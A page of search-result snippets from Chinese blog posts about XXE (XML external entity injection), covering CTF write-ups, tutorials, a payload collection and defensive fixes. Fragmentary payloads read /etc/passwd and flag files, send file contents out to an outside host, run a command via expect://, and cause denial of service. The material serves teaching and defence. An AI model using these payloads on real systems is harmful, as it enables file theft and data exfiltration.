首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏网络安全【故里】

    XXE

    XXE刷题记录 首先得先初步了解一下什么是xxe,推荐下面这个 一篇文章带你深入理解漏洞之 XXE 漏洞 XML与xxe注入基础知识 web373(有回显) 正常的xxe <? ENTITY xxe SYSTEM "file:///flag"> ]> <yu22x> <ctfshow>&xxe;</ctfshow> </yu22x> web374-376(无回显) 无回显xxe ENTITY % xxe SYSTEM 'http://150.158.181.145:9999/%file;'> "> %dtd; %xxe; 然后看这题 <? ENTITY % remote SYSTEM "http://[vps-ip]/xxe.dtd"> %remote; %send; ]> ''' payload = payload.encode('utf

    68020编辑于 2023-04-19
  • 来自专栏博客原创文章

    初始XXE

    1.什么是XXE? xxe即"XML外部实体注入漏洞",顾名思义,是由于XML允许引入外部实体导致的漏洞,当程序没有禁止或者对外部实体做验证,攻击者构造特殊的xml语句传到服务器,服务器在传输给XML解释器,xml解释器根据外部实体进行处理后返回对应的内容给服务器 - 文件读取 - 命令执行 - DOS攻击 - 内网端口探测 - ... ... ## 7.1 文件读取 - file协议 - php伪协议 ### 7.1.1 file协议 > 文件读取在XXE 解析器让其执行获取内容,从而造成了文件读取 > 其原理也是因为允许外部实体的加载,导致可以加载本地的文件 ```xml ]> &passwd; ``` > 通过构造上述的payload,如果服务器存在xxe 图片占位-4](https://pic.imgdb.cn/item/61f38a6b2ab3f51d91ca39a0.png) > 将文件以base64的形式读取出来,成功读取 ### 7.1.3 XXE

    52010编辑于 2022-08-08
  • 来自专栏博客原创文章

    初始XXE

    1.什么是XXE? xxe即"XML外部实体注入漏洞",顾名思义,是由于XML允许引入外部实体导致的漏洞,当程序没有禁止或者对外部实体做验证,攻击者构造特殊的xml语句传到服务器,服务器在传输给XML解释器,xml解释器根据外部实体进行处理后返回对应的内容给服务器 关键字,定义数据类型/类别用ELEMENT关键字 7.危害 文件读取 命令执行 DOS攻击 内网端口探测 ... ... 7.1 文件读取 file协议 php伪协议 7.1.1 file协议 文件读取在XXE --这里的&passwd;相当于调用变量,通过实体符号&加实体名称passwd加;即可调用,注意这里要在可回显的位置放入--> 通过构造上述的payload,如果服务器存在xxe漏洞,并且还会输出处理后的结果的话 <flag>&flag;</flag> 用file协议读取php文件 很明显,根据响应内容并没有读取到内容 用php伪协议读取php文件 将文件以base64的形式读取出来,成功读取 7.1.3 XXE

    61930编辑于 2022-01-28
  • 来自专栏全栈程序员必看

    XXE初探

    最近经常看到XXE出没,以为是最近才出现的一种类型,后来发现14年,乌云上面就有好多的案例,实在是我太lo了~ @Time:2018/11/15 在 jarvisoj 上面有着一道xxe的练习题,感兴趣的大佬可以去玩玩 https://www.jarvisoj.com/challenges 在写题之前,我们先科普一下,什么是xxexxe是 xml外部实体注入,这里有一段xml的解释 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素 关于xml以及xxe的知识在这位大佬的博客讲的很清楚 https://www.cnblogs.com/r00tuser/p/7255939 .html 我们的xxe注入的地方就在于xml的DTD(文档类型定义),xml格式如下 <?

    38220编辑于 2022-08-25
  • 来自专栏全栈程序员必看

    XXE payload

    一、漏洞原理 当xml可以控制,并且后端没有过滤时就存在XXE漏洞。xml解析是引用外部实体。 二、漏洞测试 平时burp 抓包 可以在请求头添加 Content-type:application/xml 并添加 xml语句如果报错 或执行则有可能存在xxe漏洞,不断根据response fuzz 即可 三、XXE payload 网上收集的payload -------------------------------------------------------------- Vanilla, used to verify outbound xxe or blind xxe -----------------------------------------------------------

    79110编辑于 2022-08-25
  • 来自专栏全栈程序员必看

    XXE攻防

    目录 前言 什么是XXE 脑图 利用思路 什么是XML XML基本语法 文档类型定义(DTD) 实体 XXE攻击分类 检测XXE存在 任意文件读取 SSRF 攻击 执行系统命令 探测内网端口 Blind XXE漏洞 靶机实测Vulnhub 搭建 任意文件读取 获取flag 靶机实测XXE-lab 防御方式 使用开发语言提供的禁用外部实体的方法 过滤用户提交的XML数据 参考 前言 什么是XXE XXE > <stockCheck><productId>381</productId></stockCheck> 该应用程序不执行针对 XXE 攻击的特定防御,因此你可以利用 XXE 漏洞通过提交以下 XXE </secret></reset> Blind XXE漏洞 对于传统的XXE来说,要求攻击者只有在服务器有回显或者报错的基础上才能使用XXE漏洞来读取服务器端文件,如果没有回显则可以使用Blind XXE 参考 [红日安全]Web安全Day8 – XXE实战攻防 浅谈XXE攻击 XXE漏洞利用技巧:从XML到远程代码执行 未知攻焉知防——XXE漏洞攻防 XXE从入门到放弃 浅谈XXE漏洞攻击与防御

    1.5K20编辑于 2022-08-31
  • 来自专栏字节脉搏实验室

    XXE学习

    使用%实体名(这里面空格不能少)在DTD中定义,并 且只能在DTD中使用“实体名;” 引用 (2)只有在DTD文件中,参数实体的声明才能引用其他 实体 (3)和通用实体一样,参数实体也可以外部引用 XXE 利用场景: 有回显、无回显 有回显的情况可以直接在页面中看到payload的执行结果或 现象(带内XML外部实体(XXE),即攻击者可以发送带有XXE有效负载的请求并从包含某些数据的web应用程序获取响应 ) 无回显的情况又称为Blind XXE,可以使用外带数据通道提 取数据即带外XML外部实体(00B-XXE) 漏洞发现: **1、首先寻找接受XML作为输入内容的端点。 如果 可以引用外部实体,则存在XXE漏洞。 若可以被解析,则检测服务器是否支持DTD引用外部实体, 如果支持引用外部实体,则存在XXE漏洞。

    1.2K20发布于 2020-05-05
  • 来自专栏漏洞知识库

    浅谈XXE漏洞

    漏洞知识库 网络安全/渗透测试/代码审计/ 关注 浅谈XXE漏洞 介绍 现在越来越多主要的web程序被发现和报告存在XXE(XML External Entity attack)漏洞,比如说facebook 尽管XXE漏洞已经存在了很多年,但是它从来没有获得它应得的关注度。很多XML的解析器默认是含有XXE漏洞的,这意味着开发人员有责任确保这些程序不受此漏洞的影响。 ENTITY 实体名称 public_ID "引用外部的url"> XXE外部实体注入(XML External Entity) 当运行引用外部实体时,通过构造恶意内容,可导致读取任意文件、执行系统命令 防御XXE攻击: 方案一:使用开发语言提供的禁用外部实体的方法 php: libxml_disable_entity_loader(true); 其他语言:百度上有详细的说明文档 方案二:过滤用户提交的 XML数据 关键词有:SYSTEM、PUBLIC XXE漏洞的演示: ?

    88230发布于 2019-11-20
  • 来自专栏E条咸鱼

    XXE漏洞学习

    例如这次的XXE,提示都到脸上了就是没想到,那么为了开始准备下一次的比赛,现在开始慢慢的会写一些类似的学习笔记(当然因为懒,有的并不会写),就当是整理一下,记忆一下 正文 那么为了方便实验,首先搭建一个 xxe漏洞的环境,直接上github找就好了 github地址:https://github.com/c0ny1/xxe-lab 下载完之后,直接将文件夹部署到php环境中就好了 ? 看到类似这样的包结构,都可以尝试用xxe漏洞,当然不同编程语言写的页面,解析出来的结果也不一样,这里针对PHP环境 那么接下来就是构造语句的问题了 这里就得提一下DTD这个东西了 DTD又称为 DOCTYPE 解析器理都不带理一下这其中的所有内容,不会拿去解析 那么回到主题上,DTD的作用基本就是这些,去定义元素的类型 那么为啥要解释这个DTD呢,因为DTD可以去定义元素类型,反之,也可以利用它去定义实体,接着调用它,导致XXE

    69630发布于 2020-08-17
  • 来自专栏FreeBuf

    浅谈XXE攻击

    介绍 现在越来越多主要的web程序被发现和报告存在XXE(XML External Entity attack)漏洞,比如说facebook、paypal等等。 尽管XXE漏洞已经存在了很多年,但是它从来没有获得它应得的关注度。 很多XML的解析器默认是含有XXE漏洞的,这意味着开发人员有责任确保这些程序不受此漏洞的影响。 由此,我们可以确认,这个应用程序存在XXE漏洞。 0×05. 如何进行XXE攻击? Code 1: 1. To read files on same server: <? 大部分的XML解析器默认对于XXE攻击是脆弱的。 因此,最好的解决办法就是配置XML处理器去使用本地静态的DTD,不允许XML中含有任何自己声明的DTD。 因此,可将外部实体、参数实体和内联DTD 都被设置为false,从而避免基于XXE漏洞的攻击。 点击阅读原文查看代码的第二段。

    90280发布于 2018-02-09
  • 来自专栏网络安全攻防

    XXE靶机实践

    服务启动随后我们进一步探测目标信息,使用dirsearch进行目录扫描dirsearch -u http://192.168.204.138通过上面的目录探测扫描发现robots.txt文件,随后我们在浏览器中进行访问,发现xxe 路径以及admin.php随后我们访问xxe路径:访问admin.php提示文件不存在注入测试随后我们在xxe页面中填写表单进行一个简单的抓包可以看到这里的请求数据包为XML格式随后我们在这里进行XXE 注入测试,发现存在XXE漏洞<? 得到明文密码:admin@123登录系统在获取到用户名和密码之后我们登录系统,结果发现提示"Sorry, this administhebest not available"此时心凉了一半,随后我们发现在xxe }文末小结本篇文章以XXE靶机为例对XXE漏洞的发现、漏洞的利用进行了详细的介绍~

    47010编辑于 2023-12-22
  • 来自专栏yuancao博客

    XXE注入漏洞

    什么是XXE 定义 XXE (XML External Entity) :XML外部实体,从安全角度理解成XML External Entity attack,即XML 外部实体注入攻击。 php $xxe = '<!DOCTYPE scan [<! php $xxe = '<!DOCTYPE scan [<! > xxe.php <?php $xxe = '<!DOCTYPE scan [<! php $xxe = '<!DOCTYPE scan [<!

    3.2K32发布于 2020-09-07
  • 来自专栏Go与云原生

    XXE 实体注入

    XXE 认识 XML 文档有自己的一个格式规范,这个格式规范是由一个叫做 DTD(document type definition) 的东西控制的,他就是长得下面这个样子 <message> < Someone</sender>

    TheReminder
    <msg>This is an amazing book</msg> </message> XXE 因此, XXE实体注入 也是一种逻辑漏洞 此外, 对于 用户输入 ,也包含了外部引用,不用语言有不同支持 靶场练习 炮台概念介绍 1.xml // 使用 system 导入的外部 xml 实体 2. ENTITY % send SYSTEM 'http://192.168.1.3/xxe/2.php? id=%file;'>" > %all; 其中 http://192.168.1.3/xxe/2.php 就是 2.php 带外接受炮台 其中 id=%file 就是 3.txt , 带外数据接收者。

    85510编辑于 2023-02-25
  • 来自专栏农夫安全

    浅谈XXE攻击

    前言 现在越来越多主要的web程序被发现和报告存在XXE(XML External Entity attack)漏洞,比如说facebook、paypal等等。 尽管XXE漏洞已经存在了很多年,但是它从来没有获得它应得的关注度。 很多XML的解析器默认是含有XXE漏洞的,这意味着开发人员有责任确保这些程序不受此漏洞的影响。 由此,我们可以确认,这个应用程序存在XXE漏洞。 0x05 如何进行XXE攻击 Code 1: 1. To read files on same server: <? 大部分的XML解析器默认对于XXE攻击是脆弱的。 因此,最好的解决办法就是配置XML处理器去使用本地静态的DTD,不允许XML中含有任何自己声明的DTD。 因此,可将外部实体、参数实体和内联DTD 都被设置为false,从而避免基于XXE漏洞的攻击。

    98760发布于 2018-03-30
  • 来自专栏TomatoCool

    浅谈XXE漏洞

    简介: XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞。 XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成一系列的危害。 XXE漏洞触发的点往往是用户能够自定义以下xml内容,服务器没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 ENTITY % name "LQK">%name;]> XXE漏洞利用思路: 假设我们能控制一段XML代码,并能够查看,下面构建XML代码: <? DOCTYPE XXE [ <!ELEMENT name ANY > <!

    34810编辑于 2023-07-30
  • 来自专栏鱼丸的渗透测试

    xxe漏洞详解

    xxe漏洞主要是利用了DTD引用外部实体导致的漏洞,xml在引用外部实体时,可以导致命令执行,任意文件读取或者内网端口探测,则命名为xxe漏洞。 ENTITY 实体名称 SYSTEM "URI">中的URI/URL可支持的协议如下 1.jpg 二、xxe 1.参数有回显 <? ENTITY % send SYSTEM 'http://192.168.1.3/xxe/2.php? ENTITY XXE SYSTEM "http://ip:port" > ]> <root> <name>&XXE;</name> </root> 端口开放时会返回报错信息,端口不存在时会无法连接 端口开放会报错 ENTITY xxe SYSTEM "file:///etc/passwd" >]> <root> <search>name</search> <value>&xxe;</value> </root>

    1.5K10编辑于 2022-04-27
  • 来自专栏一名白帽的成长史

    XXE漏洞】XXE漏洞是怎样形成的?

    Hello,各位小伙伴大家好~ 这里是你们的小编Monster~ 最近学习了XXE漏洞的基本原理,一起来看看吧! Part.1 XML基础 XML语法 XXE漏洞是由于web应用程序解析了恶意的xml代码导致的。 因此,在学习之前,我们先来康康xml的基本原理。 ? XXE就是由于xml引用了恶意的外部实体导致 (1)内部实体声明 <!ENTITY 实体名称 "实体的值"> 因为DTD是一种快捷变量,因此可改写上面的例子为: ? Part.2 XXE漏洞 漏洞实现 XXE(XML External Entity),即xml外部实体注入。引用外部实体时,不同的程序可支持不同的协议: ? 我们先来写一个简单的xml接收页面: ? 这就是一个简单的xxe漏洞利用。 pikachu平台 我们来看看pikachu平台上的xxe漏洞: ? 查看后端代码: ? 和我们的演示代码差不多,使用前面代码的尝试注入: ?

    2.8K40发布于 2020-01-14
  • 来自专栏奝-大周

    xxe漏洞学习

    前几天ctfshow的webak赛有一道利用xxe漏洞的题,当时看一些xxe的资料也没整出来,想着再学习下。 简单来说,XXE就是XML外部实体注入。 ENTITY xxe SYSTEM "expect://id" >]> <catalog> <core id="test101"> <description>&xxe;</description

    76520发布于 2020-08-19
  • 来自专栏Urahara Blog

    Hacking via XXE

    ELEMENT body (#PCDATA)> XXE漏洞攻击 ​ XML外部实体注入(XML External Entity),简称XXE,漏洞发生在应用程序解析 XML 输入时,没有禁止外部实体的加载 而在XEE漏洞的基础上,发展出了Blind XXE漏洞。 ​ 对于传统的XXE来说,要求有一点,就是攻击者只有在服务器有回显或者报错的基础上才能使用XXE漏洞来读取服务器端文件。 攻击的限制,这种漏洞也成为Blind XXE漏洞。 ENTITY xxe SYSTEM "file:///dev/random" >]> <foo>&xxe;</foo> //通过PHP伪协议 <? ENTITY xxe SYSTEM "expect://id" >]> <creds> <user>&xxe;</user> <pass>mypass</pass> </creds> ?

    79030发布于 2019-12-11
  • 来自专栏penetration

    CTFshow_Web_XXE

    知识点: 1、XML&XXE-原理&发现&利用&修复等 2、XML&XXE-黑盒模式下的发现与利用 3、XML&XXE-白盒模式下的审计与利用 4、XML&XXE-无回显&伪协议&产生层面 思路点 : 参考:https://www.cnblogs.com/20175211lyz/p/11413335.html -XXE黑盒发现: 1、获取得到Content-Type或数据类型为xml时,尝试进行 xml语言payload进行测试 2、不管获取的Content-Type类型或数据传输类型,均可尝试修改后提交测试xxe 3、XXE不仅在数据传输上可能存在漏洞,同样在文件上传引用插件解析或预览也会造成文件中的 XXE Payload被执行 -XXE白盒发现: 1、可通过应用功能追踪代码定位审计 2、可通过脚本特定函数搜索定位审计 3、可通过伪协议玩法绕过相关修复等 详细点: XML被设计为传输和存储数据 XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取

    79420编辑于 2023-05-18
领券